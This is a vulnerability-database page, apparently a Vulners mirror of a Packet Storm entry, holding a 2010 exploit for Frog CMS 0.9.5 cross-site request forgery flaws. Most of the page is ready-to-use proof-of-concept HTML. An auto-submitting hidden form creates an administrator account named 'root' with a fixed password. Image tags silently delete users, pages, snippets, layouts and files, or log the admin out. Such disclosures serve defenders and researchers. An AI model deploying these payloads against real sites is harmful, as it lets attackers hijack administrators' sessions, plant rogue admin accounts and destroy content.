Lucene search
K

Frog CMS 0.9.5 Cross Site Request Forgery

🗓️ 13 Jul 2010 00:00:00Reported by 10n1z3dType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

Frog CMS 0.9.5 Multiple CSRF Vulnerabilitie

Code
`<!---  
Title: Frog CMS 0.9.5 Multiple CSRF Vulnerabilities  
Author: 10n1z3d <10n1z3d[at]w[dot]cn>  
Date: Sun 11 Jul 2010 10:22:48 AM EEST  
Vendor: http://www.madebyfrog.com/  
Download: http://www.madebyfrog.com/public/download/files/frog_095.tar.gz  
--->  
  
-=[ CSRF PoC 1 - Create Admin User ]=-  
  
<html>  
<head>  
<title>Frog CMS 0.9.5 Multiple CSRF Vulnerabilities - Create Admin User</title>  
</head>  
<body onload="document.csrf.submit();">  
<!--- Edit these --->  
<form name="csrf" action="http://[domain]/admin/?/user/add" method="post">  
<input type="hidden" name="user[name]" value="root" />  
<input type="hidden" name="user[email]" value="[email protected]" />  
<input type="hidden" name="user[username]" value="root"/>  
<input type="hidden" name="user[password]" value="rootroot"/>  
<input type="hidden" name="user[confirm]" value="rootroot" />  
<!--- Do not edit below --->  
<input type="hidden" name="user_permission[administrator]" value="1" />  
<input type="hidden" name="user_permission[developer]" value="2" />  
<input type="hidden" name="user_permission[editor]" value="3" />  
</form>  
</body>  
</html>  
  
-=[ CSRF PoC 2 - Delete User ]=-  
  
<img src="http://[domain]/admin/?/user/delete/2" alt="Do you see this?" />  
  
-=[ CSRF PoC 3 - Delete Page ]=-  
  
<img src="http://[domain]/admin/?/page/delete/3" alt="Do you see this?" />  
  
-=[ CSRF PoC 4 - Delete Snippet ]=-  
  
<img src="http://[domain]/admin/?/snippet/delete/1" alt="Do you see this?" />  
  
-=[ CSRF PoC 5 - Delete Layout ]=-  
  
<img src="http://[domain]/admin/?/layout/delete/1" alt="Do you see this?" />  
  
-=[ CSRF PoC 6 - Delete File (works only if the File Manager plugin is installed) ]=-  
  
<img src="http://[domain]/admin/?/plugin/file_manager/delete/index.html" alt="Do you see this?" />  
  
-=[ CSRF PoC 7 - Logout The Administrator ]=-  
  
<img src="http://[domain]/admin/?/login/logout" alt="Do you see this?" />  
  
<!---  
http://www.evilzone.org/  
irc.evilzone.org (6697 / 9999)  
--->  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Jul 2010 00:00Current
0.9Low risk
Vulners AI Score0.9
33